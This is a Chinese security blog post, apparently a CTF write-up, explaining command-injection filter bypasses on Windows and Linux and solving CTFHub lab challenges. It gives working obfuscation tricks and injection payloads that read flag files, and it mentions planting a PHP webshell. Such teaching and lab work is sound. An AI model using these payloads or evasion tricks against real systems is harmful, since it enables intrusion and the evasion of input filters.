【RCE剖析】从0-1讲解RCE漏洞绕过,Windows与Linux/RCE漏洞绕过方式总结实战解析

admin 2024年8月13日11:18:47评论11 views字数 10587阅读35分17秒阅读模式

~~小羽(鱼)网安,专注于网络空间钓鱼安全~~

前言

看啥看,都来学习群,大佬们都会嘤嘤嘤~,后台添加作者备注【进群】即可和世界各地大佬相互交流。

本文讲解了windows/linux的常见命令以及命令执行漏洞绕过方式,靶场环境为ctfhub,分别有命令注入、cat过滤、空格过滤、过滤目录分隔符、运算符过滤,这几种绕过方式

Windows

我们在windows命令行中执行命令的时候,是不区分大小写

C:>WHOAMI
yvadministrator

在命令行中可以有无数个"

C:>wh""""oami
yvadministrator

C:>wh""""""""""""""""""""""""""""""oami
yvadministrator

不能有两个连续的^

C:>whoa^mi
yvadministrator

C:>whoam^^i
'whoam^i' 不是内部或外部命令,也不是可运行的程序
或批处理文件。

C:>who^a^m^i
yvadministrator

在命令中如果 "^之前,此时"数量必须为偶数

C:>who""a^mi
yvadministrator

C:>who"a^mi
'who"a^mi' 不是内部或外部命令,也不是可运行的程序
或批处理文件。

在命令中"^之后,且带有参数,则也需要带有偶数

C:>n^et" user
'net" user' 不是内部或外部命令,也不是可运行的程序
或批处理文件。

C:>n^et"" user

\YV 的用户帐户

-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
mysql WDAGUtilityAccount www
命令成功完成。

也可以使用()对命令进行包裹

C:>(whoami)
yvadministrator

C:>(n^et"" user)

\YV 的用户帐户

-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
mysql WDAGUtilityAccount www
命令成功完成。

()的数量不设上限

C:>(((whoami)))
yvadministrator

使用变量

简单拼接

%%局部分开每个变量

C:>set cmd1=who

C:>set cmd2=am

C:>set cmd3=i

C:>%cmd1%%cmd2%%cmd3%
yvadministrator

变量拼接方式二

C:>set cmd1=who

C:>set cmd3=i

C:>%cmd1%am%cmd3%
yvadministrator

变量拼接方式三

C:>set cmd1=wh"""o

C:>set cmd3=i"""

C:>%cmd1%am%cmd3%
yvadministrator

变量拼接方式四 ^

C:>set cmd1=wh""""o    # 这里需要偶数,因为在变量拼接结果中有 ^ 

C:>set cmd3=i""" # 后面正常多少个 " 都行

C:>%cmd1%a^m%cmd3%
yvadministrator

含有参数的命令,net user

C:>set cmd1=s""er

C:>set cmd2=t u

C:>set cmd3=n^e

C:>%cmd3%%cmd2%%cmd1%

\YV 的用户帐户

-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
mysql WDAGUtilityAccount www
命令成功完成。

一次性执行多条命令

C:>cmd /C "set cmd1=s""ser && set cmd2=t u && set cmd3=n^e && %cmd3%%cmd2%%cmd1%"

\YV 的用户帐户

-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
mysql WDAGUtilityAccount www
命令成功完成。

Windows环境变量切分

先设置一个变量

C:>set cmd=whoami   

C:>%cmd%
yvadministrator

这个0,1表示的数组切片,代表前后切片的索引

C:>set cmd=whoami

C:>echo %cmd:~0,1%
w

C:>echo %cmd:~0,4%
whoa

也可以为负数,负数表示从右边开始数第几个

C:>set cmd=whoami

C:>echo %cmd:~-4,4%
oami

C:>echo %cmd:~-6,4%
whoa

当然也能直接向外部写一个php一句话木马

【RCE剖析】从0-1讲解RCE漏洞绕过,Windows与Linux/RCE漏洞绕过方式总结实战解析
image-20240812113353901

检查是否存在

【RCE剖析】从0-1讲解RCE漏洞绕过,Windows与Linux/RCE漏洞绕过方式总结实战解析
image-20240812113248382

for循环执行命令

C:>cmd /V:ON /C "set kpx=awlh2im,xiaoyu&& for %G in (1,3,-3,0,6,5) do set lq=!lq!!kpx:~%G,1!&& if %G==5 !lq:~4!"

C:>set lq=!lq!!kpx:~1,1! && if 1 == 5 !lq:~4!

C:>set lq=!lq!!kpx:~3,1! && if 3 == 5 !lq:~4!

C:>set lq=!lq!!kpx:~-3,1! && if -3 == 5 !lq:~4!

C:>set lq=!lq!!kpx:~0,1! && if 0 == 5 !lq:~4!

C:>set lq=!lq!!kpx:~6,1! && if 6 == 5 !lq:~4!

C:>set lq=!lq!!kpx:~5,1! && if 5 == 5 !lq:~4!
yvadministrator

Linux

linux中是区分大小写的

┌──(root㉿251ebe86465a)-[/]
└─# LS
LS: command not found

┌──(root㉿251ebe86465a)-[/]
└─# Ls
Ls: command not found

运算符;表示连续指令,即使前面那条命令报错,后面也会接着执行

┌──(root㉿251ebe86465a)-[/]
└─# LS;whoami
LS: command not found
root

& 用于后台执行命令,这个可能看不出来

┌──(root㉿251ebe86465a)-[/]
└─# ls&wHoami
[1] 59
archive-key.asc  boot  etc   lib    lib64  mnt  proc  run   srv  tmp  var
bin              dev   home  lib32  media  opt  root  sbin  sys  usr
Command 'Whoami' not found, did you mean:
  command 'whoami' from deb coreutils
Try: apt install <deb name>
[1]+  Done                    ls --color=auto

我们使用ping 127.0.0.1 & whoami,这条命令会将ping放在后台执行,这个时候你没有设置ping的次数,就会一直执行下去,停止不了,而whoami已经执行完毕了。

┌──(root㉿kali)-[/usr/local]
└─# ping 127.0.0.1& whoami
[1] 4508
root

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=5.80 ms
┌──(root㉿kali)-[/usr/local]
└─# 64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.593 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.049 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.044 ms
64 bytes from 127.0.0.1: icmp_seq=5 ttl=64 time=0.058 ms
64 bytes from 127.0.0.1: icmp_seq=6 ttl=64 time=0.045 ms
--------之后将会一直运行下去,也停止不了。。。。

&&连接两个指令的时候,要保证命令两个命令都能正常执行,否则一个错,就执行不了了

┌──(root㉿251ebe86465a)-[/]
└─# ls&&whoami
archive-key.asc  boot  etc   lib    lib64  mnt  proc  run   srv  tmp  var
bin              dev   home  lib32  media  opt  root  sbin  sys  usr
root

┌──(root㉿251ebe86465a)-[/]
└─# LS&&whoami
LS: command not found

|管道符:用于将一个命令的输出作为另一个命令的输入。它允许两个或多个命令之间传递数据。

例如,我获取这个/data路径的下的所有包含boo的文件

┌──(root㉿251ebe86465a)-[/]
└─# ls | grep '*boo*'
boot

||逻辑运算符:如果||左边的命令执行失败(返回非零退出状态),那么||右边的命令将会被执行。执行成功一个命令后,后面的苏哦有命令都不会执行。

┌──(root㉿251ebe86465a)-[/]
└─# ip addr || wHoami || ls
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
5: eth0@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
valid_lft forever preferred_lft forever

转义字符

┌──(root㉿251ebe86465a)-[/]
└─# whoami
root

''()$,``

┌──(root㉿251ebe86465a)-[/]
└─# who''ami
root

┌──(root㉿251ebe86465a)-[/]
└─# (whoami)
root

┌──(root㉿251ebe86465a)-[/]
└─# (who''ami)
root

┌──(root㉿251ebe86465a)-[/]
└─# `(echo whoami)`
root

┌──(root㉿251ebe86465a)-[/]
└─# $(echo whoami)
root

命令引用

┌──(root㉿kali)-[/data]
└─# t=l;j=s;$t$j             #相当于执行了 ls 
谷歌插件  GitHack  miku

linux特有变量

$1$*$@$n这个n表示除0以外的任意数字,都可以作为系统命令绕过的方式

┌──(root㉿kali)-[/data]
└─# who$2ami
root

┌──(root㉿kali)-[/data]
└─# who$4ami
root

┌──(root㉿kali)-[/data]
└─# who$*ami
root

┌──(root㉿kali)-[/data]
└─# who$@ami
root

┌──(root㉿kali)-[/data]
└─# who$0ami
who-zshami:未找到命令

linux通配符

我们以执行whoami这个命令来进行测试

┌──(root㉿kali)-[/etc/docker]
└─# whereis whoami
whoami: /usr/bin/whoami /usr/share/man/man1/whoami.1.gz

┌──(root㉿kali)-[/etc/docker]
└─# /usr/bin/whoam*
root

┌──(root㉿kali)-[/etc/docker]
└─# /usr/bin/whoam?
root

┌──(root㉿kali)-[/etc/docker]
└─# /usr/bin/wh?am?
root

┌──(root㉿kali)-[/etc/docker]
└─# /usr/bin/????mi
root

┌──(root㉿kali)-[/etc/docker]
└─# /u?r/b?n/????mi
root

┌──(root㉿kali)-[/etc/docker]
└─# /*/b?n/????mi
root

Linux中命令中的命令

虽然会报错,但是命令也会正常执行

┌──(root㉿kali)-[/etc/docker]
└─# `666666`
666666:未找到命令

┌──(root㉿kali)-[/etc/docker]
└─# 666666`whoami`6666
666666root6666:未找到命令

┌──(root㉿kali)-[/etc/docker]
└─# `6666`whoami`6666`
6666:未找到命令
6666:未找到命令
root

┌──(root㉿kali)-[/etc/docker]
└─# 6666`whoami`6666
6666root6666:未找到命令

┌──(root㉿kali)-[/etc/docker]
└─# w`sfdawfewa`ho`sajfdkljas`am`sdjflk123`i
sfdawfewa:未找到命令
sajfdkljas:未找到命令
sdjflk123:未找到命令
root

┌──(root㉿kali)-[/etc/docker]
└─# wh${sdf}oam${ddkjdld}i
root

┌──(root㉿kali)-[/etc/docker]
└─# wh${sdf242341}oam${ddkjdld234232}i
root

linux环境变量切割

查看环境变量

┌──(root㉿251ebe86465a)-[/]
└─# echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

查看环境变量的长度

┌──(root㉿251ebe86465a)-[/]
└─# echo ${#PATH}
60

分割环境变量

┌──(root㉿kali)-[/etc/docker]
└─# echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/root/.dotnet/tools

┌──(root㉿kali)-[/usr/local]
└─# echo ${PATH:0:10}
/usr/local

┌──(root㉿kali)-[/usr/local]
└─# echo ${PATH:0:1}
/

靶场练习CTFHUB

【RCE剖析】从0-1讲解RCE漏洞绕过,Windows与Linux/RCE漏洞绕过方式总结实战解析
image-20240812204320193

使用&&符号,没有获取到想要的结果,因为&&在前一个命令没有执行结束的时候,是不会执行后面的命令的。

【RCE剖析】从0-1讲解RCE漏洞绕过,Windows与Linux/RCE漏洞绕过方式总结实战解析
image-20240812204401084

当然还有种思路就是指定次数,使用-c参数,这里是没有效果的

┌──(root㉿kali)-[~]
└─# ping -c 2 127.0.0.1
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.489 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.106 ms

--- 127.0.0.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1004ms
rtt min/avg/max/mdev = 0.106/0.297/0.489/0.191 ms
【RCE剖析】从0-1讲解RCE漏洞绕过,Windows与Linux/RCE漏洞绕过方式总结实战解析
image-20240812205155260

;绕过

┌──(root㉿kali)-[~]
└─# ping -c 2 127.0.0.1;whoami
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.558 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.047 ms

--- 127.0.0.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1008ms
rtt min/avg/max/mdev = 0.047/0.302/0.558/0.255 ms
root
【RCE剖析】从0-1讲解RCE漏洞绕过,Windows与Linux/RCE漏洞绕过方式总结实战解析
image-20240812213909599

使用&也可以得到结果,通过将ping命令放到后台执行,后面的结果也会执行

【RCE剖析】从0-1讲解RCE漏洞绕过,Windows与Linux/RCE漏洞绕过方式总结实战解析
image-20240812204305669
    [1] => /sys/devices/platform/serial8250/tty/ttyS2/flags
    payload:127.0.0.1 & cat /sys/devices/platform/serial8250/tty/ttyS2/flags
    
    [2] => /sys/devices/platform/serial8250/tty/ttyS0/flags
    payload:127.0.0.1 & cat /sys/devices/platform/serial8250/tty/ttyS0/flags
    
    [3] => /sys/devices/platform/serial8250/tty/ttyS3/flags
    payload:127.0.0.1 & cat /sys/devices/platform/serial8250/tty/ttyS3/flags
    
    [4] => /sys/devices/platform/serial8250/tty/ttyS1/flags
    payload:127.0.0.1 & cat /sys/devices/platform/serial8250/tty/ttyS1/flags
    
    [5] => /sys/devices/virtual/net/tunl0/flags
    payload:127.0.0.1 & cat /sys/devices/virtual/net/tunl0/flags
    
    [6] => /sys/devices/virtual/net/lo/flags
    payload:127.0.0.1 & cat /sys/devices/virtual/net/lo/flags

这些payload都给你们试过了,没有flag

不断执行命令,找到这个web目录中有一个数字.php查看即可

【RCE剖析】从0-1讲解RCE漏洞绕过,Windows与Linux/RCE漏洞绕过方式总结实战解析
image-20240812210147396

得知payload

127.0.0.1 & cat /var/www/html/17165225371506.php

查看源码

【RCE剖析】从0-1讲解RCE漏洞绕过,Windows与Linux/RCE漏洞绕过方式总结实战解析
image-20240812210421634

过滤cat

题目:过滤了cat命令之后,你还有什么方法能读到 Flag?

查看目录,他换了个名字

【RCE剖析】从0-1讲解RCE漏洞绕过,Windows与Linux/RCE漏洞绕过方式总结实战解析
image-20240812210755705

没有cat那么在linux中还有这样几个命令

tac命令是cat命令的反向操作,它会按行读取文件内容,但会以相反的顺序输出。这意味着文件的最后一行将首先显示,而第一行将最后显示。

127.0.0.1 &tac /var/www/html/flag_9902871730290.php

less命令与more命令类似,也是用于分页显示文本文件的内容,但less提供了更多的导航选项,如向前翻页、向后翻页、搜索文本等。

127.0.0.1 &less 5 /var/www/html/flag_9902871730290.php

head命令用于显示文件的开头部分,默认显示前10行,但可以通过选项指定显示的行数。

127.0.0.1 &head 5 /var/www/html/flag_9902871730290.php

tail命令用于显示文件的末尾部分,默认显示最后10行,与head命令相对应。它还可以用于实时跟踪文件的新增内容。

127.0.0.1 &tail 5 /var/www/html/flag_9902871730290.php

nl命令与cat -b命令相似,用于显示文件内容并在每行前加上行号,但nl提供了更多的格式化选项。

127.0.0.1 & nl /var/www/html/flag_9902871730290.php

awk是一个强大的文本处理工具,虽然它主要用于模式扫描和处理语言,但在某些情况下,可以使用awk命令以类似于cat的方式显示文件内容,同时添加额外的文本处理功能。

127.0.0.1 & awk '{print}' /var/www/html/flag_9902871730290.php

more命令用于分页显示文本文件的内容,用户可以通过按空格键翻页,按b键回退,按q键退出。虽然它主要用于分页查看,但在逐页查看文件内容时,与cat命令直接显示整个文件内容的方式形成对比。

127.0.0.1 & more /var/www/html/flag_9902871730290.php

过滤空格

分析源码,使用preg_match_all函数检查变量$ip中是否包含空格。

【RCE剖析】从0-1讲解RCE漏洞绕过,Windows与Linux/RCE漏洞绕过方式总结实战解析
image-20240812212619030

空格的绕过方式一般有(针对于本题来讲)

1、${IFS}代替空格

127.0.0.1&ls${IFS}/var/www/html/

2、%09相当于tab

127.0.0.1&ls%09/var/www/html/

3、大括号{}

127.0.0.1&{ls,/var/www/html/}

4、重定向字符> <>

举例

┌──(root㉿kali)-[/data]
└─# ping -c 1 127.0.0.1;ls<>-l
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.701 ms

--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.701/0.701/0.701/0.000 ms
谷歌插件  GitHack  -l  miku

payload:127.0.0.1&ls<>/var/www/html/

经过测试,上面四种仅有${IFS}成功

【RCE剖析】从0-1讲解RCE漏洞绕过,Windows与Linux/RCE漏洞绕过方式总结实战解析
image-20240812214548622

完整payload

127.0.0.1&cat${IFS}/var/www/html/flag_172742853821990.php
【RCE剖析】从0-1讲解RCE漏洞绕过,Windows与Linux/RCE漏洞绕过方式总结实战解析
image-20240812214624791

过滤目录分隔符

题目:这次过滤了目录分割符 / ,你能读到 flag 目录下的 flag 文件吗?

【RCE剖析】从0-1讲解RCE漏洞绕过,Windows与Linux/RCE漏洞绕过方式总结实战解析
image-20240812214842815

直接使用ls查看目录,没有东西

【RCE剖析】从0-1讲解RCE漏洞绕过,Windows与Linux/RCE漏洞绕过方式总结实战解析
image-20240812215933508

试试%2F

127.0.0.1 & ls %2Fvar%2Fwww%2Fhtml
【RCE剖析】从0-1讲解RCE漏洞绕过,Windows与Linux/RCE漏洞绕过方式总结实战解析
image-20240812220014717

那我们直接ls

【RCE剖析】从0-1讲解RCE漏洞绕过,Windows与Linux/RCE漏洞绕过方式总结实战解析
image-20240812215546137

使用cd和;进行多行命令执行即可,一级目录一级目录的cd即可

127.0.0.1;cd flag_is_here;cat flag_31328570616525.php
【RCE剖析】从0-1讲解RCE漏洞绕过,Windows与Linux/RCE漏洞绕过方式总结实战解析
image-20240812215753516

过滤运算符

题目:过滤了几个运算符, 要怎么绕过呢?

分析源码,过滤了运算符,但是也没完全过滤,少了个;

【RCE剖析】从0-1讲解RCE漏洞绕过,Windows与Linux/RCE漏洞绕过方式总结实战解析
image-20240812220454041

;即可

127.0.0.1;cat flag_5393398119154.php
【RCE剖析】从0-1讲解RCE漏洞绕过,Windows与Linux/RCE漏洞绕过方式总结实战解析
image-20240812220609565

原文始发于微信公众号(小羽网安):【RCE剖析】从0-1讲解RCE漏洞绕过,Windows与Linux/RCE漏洞绕过方式总结----实战解析

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月13日11:18:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【RCE剖析】从0-1讲解RCE漏洞绕过,Windows与Linux/RCE漏洞绕过方式总结实战解析https://cn-sec.com/archives/3062672.html

发表评论

匿名网友 填写信息